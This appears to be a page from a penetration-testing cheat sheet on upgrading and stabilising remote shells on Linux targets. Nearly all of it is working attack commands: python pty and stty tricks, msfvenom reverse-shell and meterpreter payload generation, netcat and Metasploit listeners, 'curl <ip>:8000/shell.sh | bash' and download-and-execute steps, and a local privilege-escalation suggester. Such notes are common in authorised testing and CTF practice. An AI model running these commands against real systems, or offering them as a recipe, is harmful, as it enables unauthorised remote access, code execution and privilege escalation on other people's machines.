Shell Upgrades

Using Python Pty

#In the dumb shell
python -c 'import pty; pty.spawn("/bin/bash")'

# ^Z to stop the netcat session. Then type
stty raw -echo; fg

Metasploit (Linux):

Generate your payloads:

msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=1234 -f raw > shell.sh

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.bin

Start listener and server:

python3 -m http.server
nc -nlvp 1234

Use your unstable shell to download the stable shell bin:

curl <ip>:8000/shell.sh | bash

Start your meterpreter listener:

set payload linux/x86/meterpreter/reverse_tcp
use exploit/multi/handler
exploit

Download your meterpreter payload and run it:

curl -o /tmp/shell.bin <ip>:8000/shell.bin
chmod +x /tmp/shell.bin
cd /tmp
./shell.bin

Elevate the shell's permissions:

^Z
use post/multi/recon/local_exploit_suggester
exploit

PreviousPassword Cracking NextLinux PrivEsc

Last updated 3 years ago